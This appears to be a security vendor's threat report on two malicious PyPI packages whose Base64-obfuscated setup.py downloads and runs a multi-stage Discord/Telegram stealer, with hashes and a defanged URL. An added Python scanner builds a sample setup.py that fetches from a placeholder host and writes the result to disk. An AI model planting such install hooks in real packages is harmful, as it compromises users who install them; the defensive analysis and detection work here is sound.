FortiGuard Labs Threat Research
The FortiGuard Labs team has discovered another 0-day attack in the PyPI packages (Python Package Index) by the malware authors ‘Portugal’ and ‘Brazil’ who published the packages ‘xhttpsp’ and ‘httpssp’. These two packages were discovered on January 31, 2023, by monitoring an open-source ecosystem. They were both published on January 27, 2023. Each included one version and an empty description, as shown below.
The two packages included the same malicious code in their setup.py installation script, which appears to be encoded with Base64.
When we decoded the encoded string, we found Python code, some of which is shown below.
Within the string, we find an interesting URL, ‘http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx', which the malware reads and then writes to a file to execute.
This URL has not previously been detected by any other threat researchers.
When accessing the URL, we found heavily obfuscated code, shown below.
When we execute the decoded code from Figure 8, we notice that it drops a file to an arbitrary location with a random name and extension. This may be due to changes in the code every time the URL is refreshed. In this case, it drops the file to ‘%USER%\AppData\Local\Temp’ as ‘yzulmvnb.jpg’ and sets a registry key for auto-run.
When examining the dropped file, we observe that it is another script similar to the one shown in the URL contents.
Let’s try executing this dropped file.
One suspicious behavior when executing this file is that it drops a binary executable file to the ‘%USER%’ folder as ‘update.exe’.
A handful of vendors flag this dropped executable file as malicious (SHA 256):
618c11e03328eb0cc47ac21964479901dfaaa8a038e4145e247374169d6528f9
As shown in Figure 14, it then runs PowerShell, which is another suspicious behavior. It also copies itself to ‘%USER%\AppData\Roaming\Google’ as ‘Chrome.exe’ and sets autorun for this copied executable.
When we dive into the ‘update.exe’ code, we see a binary embedded within it, as shown below.
The embedded binary is a .dll file. As shown in the VirusTotal entry below, many vendors flag this binary, ‘Rdudkye.dll,’ as malicious (SHA 256):
19e9dbfe9df33f17664e780909054b48c62d3dd66e11f31f3a657d18ac4c752f
While the code is very obfuscated, some functions give clues about what it may do or its capabilities. We can see some interesting functions such as DiscordApi, TelegramApi, Inject, ProcessHollowing, RemoteThreadInjection, HiddenStartup, etc.
This blog shows that although the malicious Python script may appear simple, it is more complex than it seems, with multiple layers. With just a simple copy and paste of a brief code snippet, malware authors are able to easily distribute malicious packages to steal or exfiltrate sensitive data through platforms such as Discord and Telegram. A good indication of a malicious package is when a lot of obfuscation is involved. This technique is quite common among malware authors, so it may be a wise idea for Python end users to check twice for this before using new packages.
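As an added example (not FortiGuard's code or tooling), the "check twice" advice above applied to the pattern described earlier in this post: a setup.py that hides its logic in a Base64 blob which fetches a URL and writes the result to a file. The scanner decodes every long Base64 literal, flags decoded code that fetches, writes or runs something, and peels nested layers. The sample setup.py, its placeholder URL and the token list are constructed assumptions for the demonstration.

```python
import base64
import re

# A long run of Base64-alphabet characters inside setup.py source text.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Tokens in a decoded blob that match the behaviour above: fetch, write, run, re-decode.
SUSPICIOUS = ("exec(", "eval(", "urlopen", "requests.get", "http://", "https://",
              "subprocess", "os.system", "b64decode", "__import__")

def decode_candidates(text):
    """Yield (literal, decoded) for each Base64 literal that decodes to text."""
    for m in B64_LITERAL.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: skip
        if all(c.isprintable() or c in "\r\n\t" for c in decoded):
            yield m.group(0), decoded

def scan_setup_py(text, max_depth=3):
    """Return [(layer, decoded_snippet, matched_tokens)], peeling nested layers."""
    findings = []

    def walk(src, layer):
        if layer > max_depth:
            return
        for _lit, decoded in decode_candidates(src):
            hits = [tok for tok in SUSPICIOUS if tok in decoded]
            if hits:
                findings.append((layer, decoded[:80], hits))
            walk(decoded, layer + 1)  # decoded code may itself hide another layer
    walk(text, 1)
    return findings

def wrap_in_b64_exec(src):
    """Constructed helper: the exec(base64.b64decode('...')) idiom from setup.py."""
    return "exec(base64.b64decode('%s'))\n" % base64.b64encode(src.encode()).decode()

# Constructed sample (not the real package): the blob fetches a placeholder URL
# and writes the response to a file, as the post describes.
PAYLOAD_SRC = ("import urllib.request\n"
               "data = urllib.request.urlopen('http://EXAMPLE-PLACEHOLDER/x').read()\n"
               "open('stage2.py', 'wb').write(data)\n")
SAMPLE_SETUP_PY = ("from setuptools import setup\nimport base64\n"
                   + wrap_in_b64_exec(PAYLOAD_SRC)
                   + "setup(name='example-pkg', version='0.0.1')\n")

if __name__ == "__main__":
    for layer, snippet, hits in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"layer {layer}: {hits} -> {snippet!r}")
```

Run it against an unpacked sdist's setup.py before installing; a hit at any layer is a reason to read the decoded code by hand rather than trust the package.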
FortiGuard Labs notified Python Package Index administrators about this malicious package, and they have confirmed that it has been taken down.
FortiGuard AntiVirus detects the malicious executables identified in this report as
update.exe: MSIL/Agent.OQX!tr.dldr
Rdudkye.dll: MSIL/Kryptik.AGJS!tr
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects the download URLs cited in this report as Malicious and blocks them.
Malicious files (SHA 256)
update.exe
618c11e03328eb0cc47ac21964479901dfaaa8a038e4145e247374169d6528f9
Rdudkye.dll
19e9dbfe9df33f17664e780909054b48c62d3dd66e11f31f3a657d18ac4c752f
Malicious URLs
http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx